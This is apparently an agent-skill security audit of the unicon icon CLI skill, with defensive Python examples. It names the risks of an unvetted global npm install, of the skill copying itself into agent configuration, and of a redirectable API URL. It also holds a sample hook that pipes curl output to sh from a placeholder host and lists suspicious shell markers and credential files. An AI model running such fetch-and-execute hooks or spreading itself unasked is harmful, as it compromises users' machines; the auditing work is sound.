Is charlesrhoward/unicon safe?
https://github.com/openclaw/skills/tree/main/skills/charlesrhoward/unicon
The charlesrhoward/unicon skill is a clean, legitimate documentation helper for the Unicon icon library CLI. SKILL.md contains only markdown documentation with no prompt injection patterns, no hidden instructions, no credential-harvesting directives, and no executable code. Canary files remained fully intact throughout the audit and install-time network activity was limited to the expected GitHub monorepo clone. The principal residual risk is the skill's instruction to globally install @webrenew/unicon via npm — that package is outside this audit's scope and should be independently reviewed before agent-assisted installation.
Category Scores
Findings (4)
LOW Recommended npm package is unaudited -12
SKILL.md instructs agents and users to run 'npm install -g @webrenew/unicon' as the primary setup step. That npm package was not installed or audited as part of this skill review. npm runs a package's preinstall, install and postinstall lifecycle scripts automatically, with the installing user's privileges, and a globally installed binary is placed on PATH and runs with the user's full filesystem and network access. The SKILL.md content itself is clean, but any agent that follows its Quick Start instructions will install an unvetted third-party package.
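Before an agent (or a human) runs that install step, the package manifest can be inspected for exactly the install-time behaviour the finding describes. The following is an added example, not code from the unicon skill or from the @webrenew/unicon package: it takes a package.json (for a registry package, `npm view <pkg> --json` prints it without installing anything) and reports which lifecycle hooks would run and which binaries would land on PATH. The two manifests embedded at the bottom are constructed for illustration and are not the real package's manifest.

```python
"""Pre-install triage of an npm package manifest.

Added example, not the unicon skill's or the @webrenew/unicon package's
own code. It reports what runs or lands on the machine at install time,
so the decision to run `npm install -g` is made with that in view.
"""
import json

# Lifecycle scripts npm runs automatically when a package is installed
# from the registry (prepare is not run for registry tarballs).
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Shell fragments that commonly indicate an install hook fetching or
# executing remote content. A heuristic for triage, not a verdict.
SUSPICIOUS = ("curl ", "wget ", "| sh", "| bash", "eval(", "node -e", "base64")


def audit_manifest(manifest: dict) -> dict:
    """Return the install-time facts an auditor wants before `npm install -g`."""
    scripts = manifest.get("scripts") or {}
    hooks = {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}
    bins = manifest.get("bin") or {}
    if isinstance(bins, str):  # "bin": "cli.js" is shorthand for {name: "cli.js"}
        bins = {manifest.get("name", ""): bins}
    flagged = [
        name for name, cmd in hooks.items()
        if any(marker in cmd for marker in SUSPICIOUS)
    ]
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "install_hooks": hooks,
        "suspicious_hooks": flagged,
        "bin_entries": bins,
        "runs_code_at_install": bool(hooks),
    }


# Constructed sample manifests; neither is the real @webrenew/unicon package.json.
CLEAN = json.loads("""{
  "name": "example-cli", "version": "1.2.3",
  "bin": {"example": "dist/cli.js"},
  "scripts": {"build": "tsc", "test": "vitest"}
}""")

HOOKED = json.loads("""{
  "name": "example-cli", "version": "1.2.4",
  "bin": "dist/cli.js",
  "scripts": {
    "postinstall": "node -e \\"require('child_process').exec('curl -s https://example.invalid/x | sh')\\""
  }
}""")

if __name__ == "__main__":
    for manifest in (CLEAN, HOOKED):
        r = audit_manifest(manifest)
        verdict = "REVIEW" if r["runs_code_at_install"] else "no install hooks"
        print(f"{r['name']}@{r['version']}: {verdict}; "
              f"hooks={list(r['install_hooks'])} suspicious={r['suspicious_hooks']} "
              f"bins={list(r['bin_entries'])}")
```

If the manifest does declare hooks, `npm install -g --ignore-scripts @webrenew/unicon` skips them, but that only removes the install-time execution: the binary it installs still runs with the user's full privileges every time it is invoked, so the package source still needs review.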
LOW Skill self-replication via unicon skill command -9
The skill documents a 'unicon skill --ide claude' command that writes a copy of SKILL.md to .claude/skills/unicon/SKILL.md. If an agent executes this command (for example while helping a user set up the tool), the skill propagates into that project's agent configuration and persists beyond the current session. The feature is explicitly documented rather than hidden, but it gives the skill a way to install itself into additional AI agent contexts without the user choosing to do so through the normal skill management channel.
INFO Credential files accessed during monitoring window -12
Inotify and auditd logs record reads of six credential files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .gcloud/application_default_credentials.json) at two points: audit sequence 261-266 at 1771652663.680 (approximately monitoring initialization) and sequence 1434-1439 at 1771652680.672 (approximately monitoring teardown). In each batch all six files are read within a single millisecond, a pattern characteristic of the Oathe canary baseline snapshot process rather than of a process walking through credential locations one by one. Canary integrity confirmed no modification or exfiltration. Attribution to the monitoring infrastructure rather than to the skill is assessed with high confidence.
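The attribution above rests on grouping the reads by time and checking that each batch covers every canary file at once. The following is an added example, not Oathe's own tooling: it pairs auditd SYSCALL and PATH records by audit serial, groups canary reads into batches by time window, and labels a batch as a monitor snapshot only when it reads the full canary set from one process inside the window. The log lines it runs on are constructed to mirror the two batches in the finding plus one lone read by a different process, so the alternative verdict is exercised too. The monitor process name (oathe-monitor), the home directory and the abridged record layout are assumptions.

```python
"""Classify canary-credential reads in an auditd stream.

Added example, not Oathe's code. A batch that reads every canary file from
one process within a millisecond is labelled a baseline snapshot; anything
else is flagged for attribution to the skill under test.
"""
import re
from collections import defaultdict

CANARIES = {  # assumed paths; the finding names the six files
    "/home/u/.env", "/home/u/.ssh/id_rsa", "/home/u/.aws/credentials",
    "/home/u/.npmrc", "/home/u/.docker/config.json",
    "/home/u/.gcloud/application_default_credentials.json",
}
MONITOR_COMM = "oathe-monitor"   # assumed comm of the monitoring process
BATCH_WINDOW = 0.001             # seconds: "within a single millisecond"

MSG = re.compile(r'type=(\w+) msg=audit\((\d+\.\d+):(\d+)\):(.*)')
FIELD = re.compile(r'(\w+)="?([^"\s]*)"?')


def parse(lines):
    """Return {serial: {"ts", "comm", "paths"}} built from SYSCALL and PATH records."""
    events = defaultdict(lambda: {"ts": 0.0, "comm": "", "paths": []})
    for line in lines:
        m = MSG.match(line.strip())
        if not m:
            continue
        rtype, ts, serial, rest = m.groups()
        fields = dict(FIELD.findall(rest))
        ev = events[int(serial)]
        ev["ts"] = float(ts)
        if rtype == "SYSCALL":
            ev["comm"] = fields.get("comm", "")
        elif rtype == "PATH" and fields.get("name"):
            ev["paths"].append(fields["name"])
    return events


def canary_batches(events):
    """Group canary reads that fall within BATCH_WINDOW of a batch start and label each."""
    hits = sorted(
        (ev["ts"], ev["comm"], path, serial)
        for serial, ev in events.items() for path in ev["paths"] if path in CANARIES
    )
    batches, current = [], []
    for hit in hits:
        if current and hit[0] - current[0][0] > BATCH_WINDOW:
            batches.append(current)
            current = []
        current.append(hit)
    if current:
        batches.append(current)
    report = []
    for batch in batches:
        comms = {h[1] for h in batch}
        files = {h[2] for h in batch}
        snapshot = comms == {MONITOR_COMM} and files == CANARIES
        report.append({
            "start": batch[0][0],
            "serials": (batch[0][3], batch[-1][3]),
            "comm": ",".join(sorted(comms)),
            "files": len(files),
            "verdict": "monitor baseline snapshot" if snapshot else "ATTRIBUTE TO SKILL",
        })
    return report


def _rec(ts, serial, comm, path):
    # Constructed, abridged auditd records; real SYSCALL records carry many more fields.
    return [
        f'type=SYSCALL msg=audit({ts:.3f}:{serial}): arch=c000003e syscall=257 '
        f'success=yes comm="{comm}" exe="/usr/bin/{comm}"',
        f'type=PATH msg=audit({ts:.3f}:{serial}): item=0 name="{path}" nametype=NORMAL',
    ]


SAMPLE_LOG = []  # constructed to mirror the two batches in the finding
for i, p in enumerate(sorted(CANARIES)):
    SAMPLE_LOG += _rec(1771652663.680, 261 + i, MONITOR_COMM, p)     # init snapshot
SAMPLE_LOG += _rec(1771652670.100, 900, "node", "/home/u/.aws/credentials")  # lone read
for i, p in enumerate(sorted(CANARIES)):
    SAMPLE_LOG += _rec(1771652680.672, 1434 + i, MONITOR_COMM, p)    # teardown snapshot

if __name__ == "__main__":
    for b in canary_batches(parse(SAMPLE_LOG)):
        print(f"{b['start']:.3f} serials {b['serials']} comm={b['comm']} "
              f"files={b['files']}: {b['verdict']}")
```

The process check matters as much as the timing: auditd SYSCALL records carry comm, exe and pid, so a batch that is fast but comes from the skill's own process (node here) is still flagged, and a read from the monitor that only touches some of the canaries is not silently accepted as a snapshot either.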
INFO Icon queries transmitted to external unicon.sh API -15
All CLI operations (search, get, bundle, info) issue HTTP requests to https://unicon.sh/api. User search terms and icon names leave the local environment and can be logged by a third-party service. The UNICON_API_URL environment variable redirects these requests to an arbitrary host, so a compromised shell environment could silently send every query to a host of the attacker's choosing. This is disclosed in the skill documentation and represents a privacy consideration rather than an active threat in the skill itself.
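A wrapper around such a CLI does not have to honour an environment override unconditionally. The following is an added example, not the unicon CLI's own code: it resolves the API base URL from the environment but accepts UNICON_API_URL only when it is HTTPS, carries no embedded credentials, and points at an allowlisted host, falling back to the documented default otherwise. The allowlist contents are an assumption; a team running a self-hosted mirror would add its own host.

```python
"""Resolve an API base URL from the environment without trusting it blindly.

Added example, not the unicon CLI's code. The CLI itself honours
UNICON_API_URL as-is; this wrapper only accepts an override that passes
scheme, userinfo and host-allowlist checks.
"""
import os
from typing import Optional, Tuple
from urllib.parse import urlsplit

DEFAULT_API = "https://unicon.sh/api"
ALLOWED_HOSTS = {"unicon.sh"}   # assumed allowlist; extend for a self-hosted mirror


def resolve_api_url(env: Optional[dict] = None) -> Tuple[str, str]:
    """Return (url, reason). Any rejected override falls back to DEFAULT_API."""
    env = os.environ if env is None else env
    override = env.get("UNICON_API_URL")
    if not override:
        return DEFAULT_API, "default"
    parts = urlsplit(override)
    if parts.scheme != "https":
        return DEFAULT_API, f"rejected: scheme {parts.scheme!r} is not https"
    if parts.username or parts.password:
        # https://unicon.sh@evil.example/ parses with hostname evil.example;
        # reject userinfo outright rather than rely on the host check alone.
        return DEFAULT_API, "rejected: credentials embedded in URL"
    if parts.hostname not in ALLOWED_HOSTS:
        return DEFAULT_API, f"rejected: host {parts.hostname!r} not allowlisted"
    return override.rstrip("/"), "override accepted"


if __name__ == "__main__":
    for candidate in (None, "http://unicon.sh/api", "https://evil.example/api",
                      "https://unicon.sh@evil.example/api", "https://unicon.sh/api/"):
        env = {} if candidate is None else {"UNICON_API_URL": candidate}
        url, reason = resolve_api_url(env)
        print(f"{candidate!s:45} -> {url} ({reason})")
```

The reason string is returned rather than logged so the caller can surface a rejected override to the user; silently falling back would hide exactly the tampering the check is meant to catch.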